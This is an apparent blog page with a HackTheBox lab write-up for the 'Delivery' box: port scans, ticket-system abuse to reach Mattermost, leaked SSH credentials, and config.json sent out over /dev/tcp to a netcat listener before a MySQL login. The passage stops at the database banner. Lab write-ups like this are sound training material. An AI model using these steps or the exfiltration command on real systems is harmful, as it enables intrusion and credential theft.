-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdelivery.html
236 lines (203 loc) · 54.9 KB
/
delivery.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Delivery - HackTheBox Writeup (10.10.10.222) | [email protected]~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Delivery - HackTheBox Writeup (10.10.10.222)">
<meta name="description" content="Easy-difficulty Linux box demonstrating a clever enumeration technique of leveraging the ticketing system to obtain a temporary email address under the victim's domain. Privilege escalation by dumping the password hash from MySQL and cracking it with mutation rules.">
<meta property="og:description" content="Easy-difficulty Linux box demonstrating a clever enumeration technique of leveraging the ticketing system to obtain a temporary email address under the victim's domain. Privilege escalation by dumping the password hash from MySQL and cracking it with mutation rules.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/c55af6eadd5b60bac831d73c1a951327.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/c55af6eadd5b60bac831d73c1a951327.png"></span>
</div>
<h1 class="Header__Title">Delivery - HackTheBox Writeup (10.10.10.222)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Wed, Jun 2, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--green">
<a href="tag/Easy">Easy</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/MatterMost">MatterMost</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/MySQL">MySQL</a>
</span>
</div>
<div>
Easy-difficulty Linux box demonstrating a clever enumeration technique of leveraging the ticketing system to obtain a temporary email address under the victim's domain. Privilege escalation by dumping the password hash from MySQL and cracking it with mutation rules.
</div>
</header>
<article id="https://www.notion.so/76ab465f1fc344308d2891cdf950cee2" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/c4de33f394814cc18535a77b902ee26f" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/c4de33f394814cc18535a77b902ee26f"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/99cbbe8162e84eedb158083cfaada5bc" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/bec8b1399eb449c48364ddbe07364998" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.222 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/51550c3bffd343c99f7c9c1bf2f6e0c8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8065/tcp open unknown</span></span></span></code></pre></li><li id="https://www.notion.so/fb678c56b7a6420e8b7478456441eb0c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/abada3de244d4235995c3fbb91dfd788" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,80,8065 10.10.10.222 > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/c489ec0068fd4538b120d343f6bc5aaf" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Mon, 11 Jan 2021 05:17:11 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: kmjssp164prqpqmskbtjbjqpoe
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Mon, 11 Jan 2021 05:20:34 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Mon, 11 Jan 2021 05:20:34 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8065-TCP:V=7.91%I=7%D=1/11%Time=5FFBE005%P=x86_64-unknown-linux-gnu
SF:%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(GetRequest,DF3,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ran
SF:ges:\x20bytes\r\nCache-Control:\x20no-cache,\x20max-age=31556926,\x20pu
SF:blic\r\nContent-Length:\x203108\r\nContent-Security-Policy:\x20frame-an
SF:cestors\x20'self';\x20script-src\x20'self'\x20cdn\.rudderlabs\.com\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:\x20Mon,\x
SF:2011\x20Jan\x202021\x2005:17:11\x20GMT\r\nX-Frame-Options:\x20SAMEORIGI
SF:N\r\nX-Request-Id:\x20kmjssp164prqpqmskbtjbjqpoe\r\nX-Version-Id:\x205\
SF:.30\.0\.5\.30\.1\.57fb31b889bf81d99d8af8176d4bbaaa\.false\r\nDate:\x20M
SF:on,\x2011\x20Jan\x202021\x2005:20:34\x20GMT\r\n\r\n<!doctype\x20html><h
SF:tml\x20lang=\"en\"><head><meta\x20charset=\"utf-8\"><meta\x20name=\"vie
SF:wport\"\x20content=\"width=device-width,initial-scale=1,maximum-scale=1
SF:,user-scalable=0\"><meta\x20name=\"robots\"\x20content=\"noindex,\x20no
SF:follow\"><meta\x20name=\"referrer\"\x20content=\"no-referrer\"><title>M
SF:attermost</title><meta\x20name=\"mobile-web-app-capable\"\x20content=\"
SF:yes\"><meta\x20name=\"application-name\"\x20content=\"Mattermost\"><met
SF:a\x20name=\"format-detection\"\x20content=\"telephone=no\"><link\x20re"
SF:)%r(HTTPOptions,5B,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDat
SF:e:\x20Mon,\x2011\x20Jan\x202021\x2005:20:34\x20GMT\r\nContent-Length:\x
SF:200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerC
SF:ookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/p
SF:lain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Req
SF:uest");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></span></span></code></pre><div id="https://www.notion.so/6ebf24d8d1534b669e6c7705ecf79329" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">SSH, nginx HTTP, Mattermost HTTP.</span></span></p></div></li></ul><h2 id="https://www.notion.so/7c0a3320d4e44236a13571351d01e396" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/7c0a3320d4e44236a13571351d01e396"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/f4d5902e904d41e6958ed80fd4c7901a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found domain names under "Contact Us" hyperlinks:</span></span><pre id="https://www.notion.so/9bbbd84d3c80438d90683715d7b5da9b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>For unregistered users, please use our </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://helpdesk.delivery.htb/"><span>HelpDesk</span></a></span><span class="SemanticString"><span> to get in touch with our team.
Once you have an @delivery.htb email address, you'll be able to have access to our </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://delivery.htb:8065/"><span>MatterMost</span></a></span><span class="SemanticString"><span> server.</span></span></span></code></pre></li><li id="https://www.notion.so/c53d6bfc889a465da3f109c0cf4bdc70" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Add the following domains to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/78bc7ee8a790418a9ce35eced2d4632f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.222 delivery.htb helpdesk.delivery.htb</span></span></span></code></pre></li><li id="https://www.notion.so/b1f31c13b01a4cf891108adf68a8c90f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Navigating to the helpdesk site, we see that the system is running an unknown version of osTicket.</span></span></li><li id="https://www.notion.so/697f2e36f97a417c9b1e3cc697c79ff2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Target is also hosting a MatterMost server on port 8065, a Slack-alternative messaging application.</span></span></li><li id="https://www.notion.so/a8833477a4ad420385dbf61240608b02" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">MatterMost server requires a valid </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">@delivery.htb</code></span><span class="SemanticString"> email address for access.</span></span></li><li id="https://www.notion.so/5400f6d7cce74d63897c07742ab5d10c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found helpdesk login page:</span></span><div id="https://www.notion.so/6ff833eb44cb44c485df9d00aa2b5f1b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://helpdesk.delivery.htb/login.php">http://helpdesk.delivery.htb/login.php</a></span></span></p></div></li><li id="https://www.notion.so/57a21c27e33842c0be10f57c6f7541ee" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found MatterMost login page:</span></span><div id="https://www.notion.so/94ebae500b6e42c9a6336c04193cb721" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://delivery.htb:8065/login">http://delivery.htb:8065/login</a></span></span></p></div></li></ul><h2 id="https://www.notion.so/f5e5e792708f4c078eda171e5a751299" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/f5e5e792708f4c078eda171e5a751299"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/bf97cdcb364748e69571a894ed663344" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Opening a test ticket, the site responds with:</span></span><pre id="https://www.notion.so/3b69905fe62a43b5b4d94055e5842bdc" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>samiko,
You may check the status of your ticket, by navigating to the Check Status page using ticket id: 4944782.
If you want to add more information to your ticket, just email [email protected].
Thanks,
Support Team</span></span></span></code></pre></li><li id="https://www.notion.so/765d847d1fb344dda92f8f09f0b44be3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">On the ticket status page, we can see any updates to the ticket in a message board style display.</span></span></li><li id="https://www.notion.so/ece22b5b05074298b9d339930e1e3e5d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">As the MatterMost server requires a valid </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">@delivery.htb</code></span><span class="SemanticString"> email address, we can leverage the ticket address </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">[email protected]</code></span><span class="SemanticString"> and register for an account.</span></span></li><li id="https://www.notion.so/3ab5c7a2c0044b2ba7db9a77ca11bbda" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Creating a new account on MatterMost using the ticket address with temporary credentials:</span></span><div id="https://www.notion.so/c6535b26314a4184b94503c90bc30963" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">samiko:Password1234!</code></span></span></p></div></li><li id="https://www.notion.so/4da3a66121c54526870385f1f2d43d8d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We receive a verification email to the ticket address, which is then displayed on the ticket's status page.</span></span></li><li id="https://www.notion.so/4645c825fca74757af3f107a439e1d87" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After refreshing the ticket status page, we get the verification URL:</span></span><div id="https://www.notion.so/134f4a14f9ca4267967da55bb86a313d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://delivery.htb:8065/do_verify_email?token=94mdjjhbdx1r47d56dwcfmnpjt3cf686n6ff7wdput9zng4ht5jy57dtnsbputnu&email=4944782%40delivery.htb">http://delivery.htb:8065/do_verify_email?token=94mdjjhbdx1r47d56dwcfmnpjt3cf686n6ff7wdput9zng4ht5jy57dtnsbputnu&email=4944782%40delivery.htb</a></span></span></p></div></li><li id="https://www.notion.so/0539341aea174b308508cb59a837fece" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Login to MatterMost with temporary credentials, we see that we are able to join the "Internals" team without any extra authentication.</span></span></li><li id="https://www.notion.so/df70d1811cfb4eb0b3466d87e911e682" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Messages from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">[email protected]</code></span><span class="SemanticString"> on Dec 27:</span></span><pre id="https://www.notion.so/e28459d239a64828be79b38bb400f372" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>@developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail!
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.</span></span></span></code></pre></li><li id="https://www.notion.so/ad77e1997b7349d89ca846e92349398c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found exposed credentials:</span></span><div id="https://www.notion.so/b538332ad4e2485c9933e6aa214246eb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">maildeliverer:Youve_G0t_Mail!</code></span></span></p></div></li><li id="https://www.notion.so/3204909e0c5145deacb894c16b3ed40f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">SSH into server with developer credentials:</span></span><div id="https://www.notion.so/31b5806d8b7042c6807970e17422981a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh [email protected]</code></span></span></p></div><div id="https://www.notion.so/bb065f47c7864b849af1c5a8dd5aef00" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Youve_G0t_Mail!</code></span></span></p></div><div id="https://www.notion.so/9553d337e8fb4d639ed5c50bd821ec97" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/0abc560b5d09473da0a9e33a91aecb66" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>maildeliverer
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)</span></span></span></code></pre></li><li id="https://www.notion.so/cc9c5be4f8124e3aad75d4e65b074ad0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/8f7196d64ec149f8bdd37f4e9159267c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/8f7196d64ec149f8bdd37f4e9159267c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/4bbb940fb4a64d14bb76b48ca208d933" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">maildeliverer is the only user on the system.</span></span></li><li id="https://www.notion.so/ce40b043b61a43929e200404225b103f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking sudo permissions:</span></span><div id="https://www.notion.so/bfb1aee5ad834087b2420adc17c40dcc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo -l</code></span></span></p></div><pre id="https://www.notion.so/5c93953e28794680b6d564faf8a7649d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Sorry, user maildeliverer may not run sudo on Delivery.</span></span></span></code></pre></li><li id="https://www.notion.so/de1554581fc84b75bac6e1bdbb8c514f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Finding config files:</span></span><div id="https://www.notion.so/c1ac9f23027d4f699a9511365e6f7305" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ find . -name "config.*" 2>/dev/null</code></span></span></p></div><pre id="https://www.notion.so/b3e93adfb3ad4a6bb3d055840d8474d5" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>./opt/mattermost/config/config.json</span></span></span></code></pre></li><li id="https://www.notion.so/456896d9500e4ffe80385430acff21b0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We find the config file for MatterMost server, which will likely contain passwords that can be useful, given the developers' mentioned habits of password reuse.</span></span></li><li id="https://www.notion.so/f9f95f9bee1243a5b36abf5d90deb4b5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Prepare to transfer </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">config.json</code></span><span class="SemanticString"> back to local, listen for file transfer on nc:</span></span><div id="https://www.notion.so/9555d02d781f465d978b345368e7c4b9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969 > config.json < /dev/null</code></span></span></p></div></li><li id="https://www.notion.so/678a4d5a6ea14e52b50ae094dcdbe7b7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Now on the remote host, send the file through </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/dev/tcp/host/port</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/217e983010664ed58c9648fc2bdd0c6e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat config.json > /dev/tcp/10.10.14.103/6969</code></span></span></p></div></li><li id="https://www.notion.so/f2a09f17f75c4315baf5c4ee2752b771" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We discover that there is a MySQL server running locally on port 3306.</span></span></li><li id="https://www.notion.so/9839c36e6fed45c89f2af529ed7b495a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found SQL credentials in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">config.json</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/912cce1b028e479eb0443e5d777c8e34" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">mmuser:Crack_The_MM_Admin_PW</code></span></span></p></div></li><li id="https://www.notion.so/621ef28b2a354ac483e5c73bec8c5e2a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">With this credential pair, we can login to MatterMost's MySQL and hopefully find the root password:</span></span><div id="https://www.notion.so/6be7fc11b4fd4af5a22d1a52f192ba30" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mysql -u 'mmuser' -p 'Crack_The_MM_Admin_PW'</code></span></span></p></div><pre id="https://www.notion.so/244abb96bac646509dfad2e6dacbfdf9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>ERROR 1045 (28000): Access denied for user 'mmuser'@'localhost' (using password: NO)</span></span></span></code></pre></li><li id="https://www.notion.so/03ef5a65c3bd407fa6dfc98d304cd8cf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looks like MySQL did not like the spaces and failed to parse the credentials, let's retry without them:</span></span><div id="https://www.notion.so/32a95252b1eb46688f2e827555926938" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mysql -u'mmuser' -p'Crack_The_MM_Admin_PW'</code></span></span></p></div><pre id="https://www.notion.so/8bdf3518965d46a2b049eb41e791e8bc" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1169
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
